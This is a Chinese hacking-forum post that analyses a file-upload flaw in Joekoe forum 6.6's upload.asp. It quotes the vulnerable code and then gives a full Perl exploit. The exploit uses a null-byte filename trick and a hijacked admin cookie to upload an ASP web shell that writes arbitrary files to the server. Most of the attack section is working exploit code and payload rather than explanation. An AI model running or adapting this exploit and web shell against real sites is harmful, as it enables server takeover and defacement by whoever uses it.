本文作者: xiaolu
前言:昨天看黑防网站看到黑防第8期上有篇文章《乔客论坛惊爆UPfile严重漏洞》,无奈阿,我这里买不到黑防,只能自己分析分析看看,以下是针对乔客整站程序免费6.6版。
先看upload.asp代码:
复制内容到剪贴板
代码:
<%
dim formname,upload_path,upload_type,upload_size,uup
uup="|article|down|forum|gallery|news|other|product|video|website|"
.
.
.
.
up_name=trim(upload.form("up_name"))
up_text=trim(upload.form("up_text"))
up_path=trim(upload.form("up_path"))
if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
if len(up_name)<3 then up_name=up_name&upload_time(now_time)
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
if len(up_path)<3 then up_path="other"
uppath=up_path
if right(upload_path,1)<>"/" then upload_path=upload_path&"/"
up_path=server.mappath(upload_path&up_path)
.
.
upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
upfile_name=lcase(upfile_name)
if instr(","&upload_type&",",","&upfile_name&",")>0 then
upfile_name2=upfile_name
upfile_name=up_name&"."&upfile_name
upfile.SaveAs up_path&upfile_name
.
.
else
uptemp="<font class=red_2>上传失败</font>:文件类型只能为:"&replace(upload_type,"|","、")&"等格式) "&go_back
end if
.
.
.看几个提交的变量,up_name,up_path,up_text,upfile_name。先看up_path 部分,也就是这里:
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
只要up_path的值不包含在uup 里边也就是:
article,down,forum,gallery,news,other,product,video,website
里边up_path就变成了other目录了,这里我们没有用武之地。再看upfile_name,也就是文件扩展名:
upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
他这个过滤的比较严格,甚至于文件名里边只能有一个.符号,如果文件名是asp.asp.gif也被认为非法,因为他是从第一个.号开始截取到末尾的,放弃这个。代码里很明显up_text对我们来说无用。只剩up_name这个了:
复制内容到剪贴板
代码:
if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
if len(up_name)<3 then up_name=up_name&upload_time(now_time)如果我们不是用管理员身份登陆过后台,也就是session("joekoe_online_admin")<>"joekoe_admin",只要up_name长度达于2,up_name就成了空值,郁闷,不过当session("joekoe_online_admin")="joekoe_admin",我们可以利用,利用程序如下(cookie需要admin的):
复制内容到剪贴板
代码:
#!/usr/bin/perl
$| = 1;
use Socket;
$host = "10.0.0.1";
$port = "80";
$str =
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_path\"\r\n".
"\r\n".
"gallery\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_name\"\r\n".
"\r\n".
"p.asp\0\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_text\"\r\n".
"\r\n".
"spic\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"file_name1\"; filename=\"F:\\tools\\sql\\getwebs\\p.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"<%dim objFSO%>\r\n".
"<%dim fdata%>\r\n".
"<%dim objCountFile%>\r\n".
"<%on error resume next%>\r\n".
"<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n".
"<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n".
"<%fdata = request(\"cyfddata\")%>\r\n".
"<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n".
"<%objCountFile.Write fdata%>\r\n".
"<%if err =0 then%>\r\n".
"<%response.write \"<font color=red>save Success!</font>\"%>\r\n".
"<%else%>\r\n".
"<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n".
"<%end if%>\r\n".
"<%err.clear%>\r\n".
"<%end if%>\r\n".
"<%objCountFile.Close%>\r\n".
"<%Set objCountFile=Nothing%>\r\n".
"<%Set objFSO = Nothing%>\r\n".
"<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"submit\"\r\n".
"\r\n".
"点击上传\r\n".
"-----------------------------7d41869a401aa\r\n".
"\r\n";
print $str;
$len=length($str);
$req ="POST /jj/upload.asp?action=upfile HTTP/1.0\r\n".
#"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n".
"Referer: [url]http://10.0.0.1/jj/upload.asp?uppath=gallery&upname=gs200483164242&uptext=spic[/url]\r\n".
#"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41869a401aa\r\n".
#"Accept-Encoding: gzip, deflate\r\n".
#"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n".
"Host: 10.0.0.1\r\n".
"Content-Length: $len\r\n".
#"Connection: Keep-Alive\r\n".
#"Cache-Control: no-cache\r\n".
"Cookie: ASPSESSIONIDQAQQRCTQ=DOKDHBIALDIDGJFJMCMMIBFJ; joekoe%5Fonline=login%5Fpassword=dd15f89d35c36afb&guest%5Fname=&login%5Fusername=joekoe&counters=yes\r\n".
"\r\n".
"$str";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}后记:极度郁闷中。。。。。。。,谁能把黑防的文章给偶看看?
